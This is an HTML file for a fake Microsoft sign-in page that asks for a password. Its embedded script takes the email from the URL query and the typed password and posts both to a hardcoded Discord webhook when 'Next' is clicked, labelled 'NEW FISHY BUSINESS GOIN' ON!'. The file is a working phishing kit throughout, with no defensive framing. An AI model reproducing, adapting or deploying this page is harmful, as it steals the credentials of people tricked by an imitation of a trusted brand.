<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<html>
  <head>
    <title>Microsoft Login</title>
    <link rel="stylesheet" href="microsoft.css">
  </head>
  <body>
    <div class="container">
      <img src="microsoftlogo.svg"></img>
      <br><br>
      <span id="email"></span>
      <br><br>
      <h2 class="label">Enter password</h2>
      <br><br>
        <input type="text" placeholder="Password" id="password">
        <br><br>
        <small><a href="">Forgot password?</a></small>
        <br><br>
        <small><a href="">Other ways to sign in</a></small>
        <br><br><br>
      <br>
      <button class="nextbutton" onclick="finish()">Next</button>
    </div>

    <script>
      const urlParams = new URLSearchParams(window.location.search);
      const email = urlParams.get('email');
      document.getElementById('email').textContent = email;

      
      function finish() {
        const webhook = "https://discord.com/api/webhooks/1352368059188514867/KrEtD4rbh6TDe_bIBZGdoxca5eH85AZOUm1tcmYV0heZ9Vp34HRue83xzhyuAFAZJ3gU"; //Don't use this to spam, please.
        const contents = `NEW FISHY BUSINESS GOIN' ON!\n\nEmail: ${email}\nPassword: ${document.getElementById("password").value}`;
        const request = new XMLHttpRequest();
        request.open("POST", webhook);
        request.setRequestHeader('Content-type', 'application/json');
        const params = {
          content: contents
        }
        request.send(JSON.stringify(params));
      }

    </script>
    
  </body>
</html>
